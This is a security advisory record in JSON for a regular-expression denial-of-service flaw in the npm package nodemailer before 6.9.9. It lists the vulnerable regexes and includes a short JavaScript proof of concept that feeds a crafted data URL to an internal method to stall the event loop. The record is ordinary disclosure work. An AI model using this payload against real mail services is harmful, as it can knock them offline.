{"id":"GHSA-9h6g-pr28-7cqp","summary":"nodemailer ReDoS when trying to send a specially crafted email","details":"### Summary\nA ReDoS vulnerability occurs when nodemailer tries to parse img files with the parameter `attachDataUrls` set, causing the stuck of event loop. \nAnother flaw was found when nodemailer tries to parse an attachments with a embedded file, causing the stuck of event loop. \n\n### Details\n\nRegex: /^data:((?:[^;]*;)*(?:[^,]*)),(.*)$/\n\nPath: compile -\u003e getAttachments -\u003e _processDataUrl\n\nRegex: /(\u003cimg\\b[^\u003e]* src\\s*=[\\s\"']*)(data:([^;]+);[^\"'\u003e\\s]+)/\n\nPath: _convertDataImages\n\n### PoC\n\nhttps://gist.github.com/francoatmega/890dd5053375333e40c6fdbcc8c58df6\nhttps://gist.github.com/francoatmega/9aab042b0b24968d7b7039818e8b2698\n\n```js\nasync function exploit() {\n   const MailComposer = require(\\\"nodemailer/lib/mail-composer\\\");\n   const MailComposerObject = new MailComposer();\n\n   // Create a malicious data URL that will cause excessive backtracking\n   // This data URL is crafted to have a long sequence of characters that will cause the regex to backtrack\n   const maliciousDataUrl = 'data:image/png;base64,' + 'A;B;C;D;E;F;G;H;I;J;K;L;M;N;O;P;Q;R;S;T;U;V;W;X;Y;Z;'.repeat(1000) + '==';\n\n   // Call the vulnerable method with the crafted input\n   const result = await MailComposerObject._processDataUrl({ path: maliciousDataUrl });\n}\n\nawait exploit();\n```\n\n### Impact\n\nReDoS causes the event loop to stuck a specially crafted evil email can cause this problem.","aliases":["CVE-2024-58379"],"modified":"2026-09-01T03:56:10.823058554Z","published":"2024-01-31T22:42:54Z","database_specific":{"cwe_ids":["CWE-1333"],"severity":"MODERATE","github_reviewed":true,"github_reviewed_at":"2024-01-31T22:42:54Z","nvd_published_at":null},"references":[{"type":"WEB","url":"https://github.com/nodemailer/nodemailer/security/advisories/GHSA-9h6g-pr28-7cqp"},{"type":"WEB","url":"https://github.com/nodemailer/nodemailer/commit/dd8f5e8a4ddc99992e31df76bcff9c590035cd4a"},{"type":"WEB","url":"https://gist.github.com/francoatmega/890dd5053375333e40c6fdbcc8c58df6"},{"type":"WEB","url":"https://gist.github.com/francoatmega/9aab042b0b24968d7b7039818e8b2698"},{"type":"PACKAGE","url":"https://github.com/nodemailer/nodemailer"}],"affected":[{"package":{"name":"nodemailer","ecosystem":"npm","purl":"pkg:npm/nodemailer"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"6.9.9"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 6.9.8","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-9h6g-pr28-7cqp/GHSA-9h6g-pr28-7cqp.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}]}